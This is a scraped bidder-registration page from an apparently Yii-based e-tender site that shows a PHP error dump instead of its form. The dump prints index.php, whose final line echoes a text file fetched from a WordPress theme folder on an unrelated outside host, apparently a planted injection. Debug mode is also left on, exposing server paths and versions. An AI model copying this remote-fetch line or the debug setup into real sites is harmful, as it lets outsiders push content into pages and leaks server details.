Monday, March 27, 2023

Bidder Registration Details

Enter your details below then click the Create button to continue your registration.

Most of the times we will communicate with you by email, so you should provide a valid email address before you proceed. You will use your email address as login id when accessing the site.

Fields with * are required.

Login Information 


Organization Information 
 
 


Contact Person (Signatory)

Terms & Conditions 
PHP Error

PHP Error

Description

file_get_contents() [<a href='function.file-get-contents'>function.file-get-contents</a>]: SSL operation failed with code 1. OpenSSL Error messages:
error:1407742E:SSL routines:func(119):reason(1070)

Source File

/var/www/e-tender/index.php(12)

00001: <?php
00002: 
00003: // change the following paths if necessary
00004: $yii=dirname(__FILE__).'/../yii/framework/yii.php';
00005: $config=dirname(__FILE__).'/protected/config/main.php';
00006: 
00007: // remove the following line when in production mode
00008: defined('YII_DEBUG') or define('YII_DEBUG',true);
00009: 
00010: require_once($yii);
00011: Yii::createWebApplication($config)->run();
00012: echo file_get_contents("https://www.bspkart.com/wp-content/themes/oceanwp/2023.txt");

Stack Trace

#0 /var/www/e-tender/index.php(12): file_get_contents()
2023-03-27 20:26:34 Apache/2.2.14 (Ubuntu) Yii Framework/1.1.0